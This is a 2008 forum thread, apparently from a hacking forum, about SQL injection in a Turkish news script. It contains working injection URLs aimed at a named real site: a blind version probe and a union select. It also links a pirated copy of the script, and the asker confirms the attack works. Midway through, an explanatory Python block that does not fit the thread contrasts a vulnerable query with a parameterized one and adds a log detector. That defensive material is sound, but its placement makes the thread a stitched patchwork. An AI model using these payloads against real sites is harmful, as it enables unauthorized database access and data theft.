View full version: sql injection is accepted but...


aman12
31.03.2008, 09:56
This Turkish news script accepts SQL injection, but there are no results (I cannot inject a char). This is a very important bug, because there are several thousand sites with this script!

check it here:

http://www.medyapolitik.com/tr/article_view.php?aid=1888-1

Same result here:
http://www.medyapolitik.com/tr/article_view.php?aid=1887

you can download nulled script here
http://rapidshare.com/files/33605976/internethaber.com.rar

blackybr
31.03.2008, 12:27
http://www.medyapolitik.com/tr/article_view.php?aid=1888+and+substring(version(), 1,1)=5/*

You can use subqueries with one-char SQL bruteforce. In fact the script probably selects one item from the news table that contains all the text and other info about it (there exist two or more queries for this parameter and they have a different number of columns), so you can't output the info directly.

Scipio
31.03.2008, 13:55
If you are interested in this site, but it was not the script, that is the withdrawal of the injection
http://www.medyapolitik.com/tr/cats.php?catid=-10%20union%20select%201/*
sorry for my english... translate.google.com)
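The two posts above describe the same root cause from the attacker's side: the `aid`/`catid` value is pasted straight into the SQL text, so an appended boolean condition (blackybr's post) or a `union select` (Scipio's post) becomes part of the query. The following is an added example, not code from the thread or from the Turkish news script (whose source is not shown here); the table layout, column names and log lines are constructed. It shows the concatenating query beside a parameterized one with an integer check, and a small log check a site owner could run over access logs to spot non-numeric id parameters. The table, conditions and log entries are constructed samples.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed stand-in for the script's news table (real schema unknown).
SAMPLE_ARTICLES = [
    (1887, "Article 1887", "Body of article 1887"),
    (1888, "Article 1888", "Body of article 1888"),
]


def make_db():
    """In-memory SQLite database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (aid INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SAMPLE_ARTICLES)
    return conn


def fetch_article_vulnerable(conn, aid):
    """Builds the query by string concatenation, as the thread suspects the
    script does. Anything appended to the id is executed as SQL, so a true
    condition returns the row and a false one returns nothing: that one-bit
    difference is what the blind technique in blackybr's post relies on."""
    sql = "SELECT aid, title FROM articles WHERE aid = " + aid
    return conn.execute(sql).fetchone()


def fetch_article_safe(conn, aid):
    """Hardened form: reject anything that is not a plain integer, then bind
    the value as a parameter so the database never parses it as SQL."""
    if not aid.isdigit():
        return None
    return conn.execute(
        "SELECT aid, title FROM articles WHERE aid = ?", (int(aid),)
    ).fetchone()


# Constructed access-log lines in combined log format (hypothetical IPs).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [31/Mar/2008:09:56:00 +0000] "GET /tr/article_view.php?aid=1887 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [31/Mar/2008:12:27:00 +0000] "GET /tr/article_view.php?aid=1888+and+1=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [31/Mar/2008:13:55:00 +0000] "GET /tr/cats.php?catid=-10%20union%20select%201 HTTP/1.1" 200 880',
]


def suspicious_requests(log_lines, numeric_params=("aid", "catid")):
    """Returns (line_number, param, decoded_value) for every request whose
    id parameter is not a plain (optionally negative) integer. Decoding via
    parse_qs means '+' and '%20' encodings are caught alike."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        try:
            request_path = line.split('"')[1].split()[1]
        except IndexError:
            continue  # malformed line, not a request record
        query = parse_qs(urlsplit(request_path).query)
        for param in numeric_params:
            for value in query.get(param, []):
                if not value.lstrip("-").isdigit():
                    hits.append((n, param, value))
    return hits


if __name__ == "__main__":
    db = make_db()
    print(fetch_article_vulnerable(db, "1888 and 1=1"))  # row comes back
    print(fetch_article_vulnerable(db, "1888 and 1=2"))  # None: condition leaks
    print(fetch_article_safe(db, "1888 and 1=1"))        # None: input rejected
    for hit in suspicious_requests(SAMPLE_ACCESS_LOG):
        print("suspicious:", hit)
```

The integer check plus parameter binding in `fetch_article_safe` is the fix the script needs regardless of how many queries use the parameter; the log check only finds attempts after the fact and should be read as a triage aid, not a substitute for the fix.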

aman12
31.03.2008, 19:38
thank you very much it works :))))

Scipio
02.04.2008, 18:46
You're welcome;)